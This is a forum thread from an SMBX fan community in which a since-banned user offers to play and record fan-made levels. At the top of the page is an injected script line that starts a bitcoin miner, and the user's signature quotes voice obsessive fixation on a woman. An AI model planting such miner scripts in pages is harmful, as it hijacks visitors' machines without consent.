<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitypge project

Willhart plays SMBX levels sometimes. (IN 60fps)

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Willhart plays SMBX levels sometimes. (IN 60fps)

Postby Willhart » 1 year ago

Recommend me levels to play, and I may try them and record a video. I'm not too good at smbx, but I'm hoping to improve, so anything like Kaizo likely won't go too well. This means that I won't guarantee the will be beaten. The videos will not have commentary, unless requested. Post the request here on this thread, and don't forget to add a download link for the level too.

My Channel: https://www.youtube.com/user/MrWillhart

Current playlist here:
https://www.youtube.com/playlist?list=P ... J0KP3niB5X
Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

Part of me feels like writing her name over and over again
...I should not give up.
💔

Willhart
Banned

Re: Willhart plays SMBX levels sometimes. (IN 60fps)

Postby Willhart » 1 year ago

Here is a taste of the video quality.

Willhart wrote:Being a fan means... blind obsession.... She does not have to accept it... I thought it brought me closer to her.
Willhart wrote:[She] is planning on joining the patreon discord thing on advanced group, and that likely means that I'll listen trough every single one of those as they happen...

...I should not give up.
💔

Willhart
Banned

Re: Willhart plays SMBX levels sometimes. (IN 60fps)

Postby Willhart » 9 months ago

I'm still up for playing levels if anyone has recommendations? Been fairly quiet for a while, and I should have time.

...I should not give up.
💔

Return to “SMBX2 (Current - 2.0 Beta 3)”